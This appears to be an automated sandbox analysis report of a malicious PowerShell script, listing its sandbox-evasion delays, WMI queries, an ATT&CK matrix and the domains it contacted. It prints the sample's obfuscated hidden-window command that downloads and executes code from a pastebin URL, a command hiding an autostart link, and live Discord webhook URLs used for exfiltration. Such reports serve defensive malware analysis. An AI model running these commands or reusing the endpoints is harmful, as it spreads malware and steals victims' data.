Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5361Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1454Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4086Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5618Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1026Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 510Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5136
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4590
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3324Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep count: 1454 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628Thread sleep count: 141 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep count: 151 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep count: 4086 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1756Thread sleep count: 5618 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1152Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep count: 1026 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736Thread sleep count: 510 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep count: 175 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep count: 5136 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep count: 4590 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.1654089475.000001F77E3A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW)Q
Source: powershell.exe, 00000007.00000002.1873629350.000001D4FB25A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: powershell.exe, 0000000C.00000002.1941161276.00000201B4960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1653152889.000001F77E318000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
File and Directory Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534226 Sample: cr_asm_atCAD.ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 84 37 pastebin.com 2->37 39 raw.githubusercontent.com 2->39 41 discord.com 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Sigma detected: Suspicious PowerShell Parameter Substring 2->53 55 AI detected suspicious sample 2->55 8 powershell.exe 1 24 2->8         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 57 Connects to a pastebin service (likely for C&C) 37->57 process4 dnsIp5 43 discord.com 162.159.136.232, 443, 49710, 49717 CLOUDFLARENETUS United States 8->43 35 C:\ProgramData\...\BeginSync.lnk, MS 8->35 dropped 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->61 63 Suspicious powershell command line found 8->63 65 Tries to open files direct via NTFS file id 8->65 67 Powershell creates an autostart link 8->67 17 conhost.exe 8->17         started        19 attrib.exe 1 8->19         started        21 powershell.exe 7 13->21         started        24 conhost.exe 1 13->24         started        26 powershell.exe 7 15->26         started        28 conhost.exe 1 15->28         started        file6 signatures7 process8 signatures9 59 Suspicious powershell command line found 21->59 30 powershell.exe 14 15 21->30         started        33 powershell.exe 26->33         started        process10 dnsIp11 45 raw.githubusercontent.com 185.199.110.133, 443, 49706, 49708 FASTLYUS Netherlands 30->45 47 pastebin.com 104.20.3.235, 443, 49704, 49705 CLOUDFLARENETUS United States 30->47

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cr_asm_atCAD.ps13%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.microsoft0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://crl.v0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.136.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.110.133
    		truetrue
      		unknown
      pastebin.com
      		104.20.3.235
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4true
          		unknown
          http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txttrue
              		unknown
              https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5true
                		unknown
                http://pastebin.com/raw/sA04Mwk2false
                  		unknown
                  https://pastebin.com/raw/sA04Mwk2false
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMpowershell.exe, 00000007.00000002.1800661112.000001D481725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D30D000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1644785909.000001F7101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1644785909.000001F71006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://discord.compowershell.exe, 00000000.00000002.1618712133.000001F701D2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        		unknown
                        http://crl.microsoftpowershell.exe, 00000007.00000002.1872751109.000001D4FB130000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          https://go.micropowershell.exe, 00000000.00000002.1618712133.000001F7017B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480E43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: safe
                          		unknown
                          https://discord.com/api/webhooks/129575196622756powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://raw.githubusercontpowershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              http://www.microsoft.coxpowershell.exe, 00000000.00000002.1652936620.000001F77E120000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://discord.com/powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://discord.compowershell.exe, 00000000.00000002.1618712133.000001F701E27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://pastebin.com/raw/sA04Mwk2mandpowershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        https://0.discorpowershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://raw.githubusercontent.compowershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D2A2000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewvpowershell.exe, 0000000C.00000002.1871797306.000002019D30D000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8Jpowershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, cr_asm_atCAD.ps1true
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1644785909.000001F7101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1644785909.000001F71006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://raw.githubusercontent.compowershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D2A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D273000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://raw.githubusercontepowershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
